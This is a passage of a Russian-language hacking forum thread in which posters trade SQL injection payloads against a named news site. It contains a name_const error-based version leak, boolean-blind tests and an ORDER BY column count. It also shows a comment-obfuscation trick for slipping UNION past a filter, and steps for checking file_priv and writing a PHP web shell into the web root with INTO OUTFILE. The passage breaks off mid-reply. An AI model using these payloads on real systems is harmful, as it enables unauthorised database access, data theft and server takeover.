Инглиш бро. Криво установлено все.

Как вывести версию БД, столкнулся с жесткой фильтрацией и обойти не получается?

_http://1cnews.com/index.php?mode=search&sstring='and(select*from(sel ect(name_const(version(),1)),name_const(version(), 1))a)and'

В title 5.1.33-log

Вот так бро А то в поиске заморочки с LIKE. Вообщем все гениальное просто

как ты количество полей подобрал, каким запросом?

Тут главное внимательность.

http://1cnews.com/index.php?mode=viewpart&part=10

Делаем запрос:

http://1cnews.com/index.php?mode=viewpart&part=10'

В заголовке исчезает "Events of the branch". Что то тут не так

Проверяем на inj.

http://1cnews.com/index.php?mode=viewpart&part=10+and+1=1

"Events of the branch" появился. А если:

http://1cnews.com/index.php?mode=viewpart&part=10+and+1=2

Исчез. Соответственно, true и false.

http://1cnews.com/index.php?mode=viewpart&part=10+and+1=1+order+by+1 0--+f

Заголовок исчез.

http://1cnews.com/index.php?mode=viewpart&part=10+and+1=1+order+by+3--+f

Пояивлся, соответственно, кол-во 3.

Ну а дальше

http://1cnews.com/index.php?mode=viewpart&part=10+and+1=1+union+sele ct+1,2,3--+f

403 forbidden

Попробуем убрать union, все выводится, значит фильтрует union. Шифруем union => /*!uniON*/

Пробуем

http://1cnews.com/index.php?mode=viewpart&part=10+and+1=1+/*!uniON*/+select+1,2,3--+f

Заголовок есть, 10 заменяем на -10. В заголовке видим цифру 2.

P.S. Вообщем контент-based injection

Есть доступ к бд как залить shell ?

Сначала посмотри File_priv. Для этого:

http://site.ltd/a.php?a=-1+union+select+1,user(),3--+f

Копируем юзера.

http://site.ltd/a.php?a=-1+union+select+1,file_priv,3+from+mysql.user+where +user='тут юзер'--+f

Если выведет N, то залить не получится. Если Y + mq=off, то:

http://site.ltd/a.php?a=-1+union+select+1,,3+into+outfile+'/path/to/www/dir/file.php'--+f

После этого шелл будет по адресу site.ltd/dir/file.php

У меня прямой доступ =) Нут не sql inj ) Захожу через Navicat

Ты про это наверно: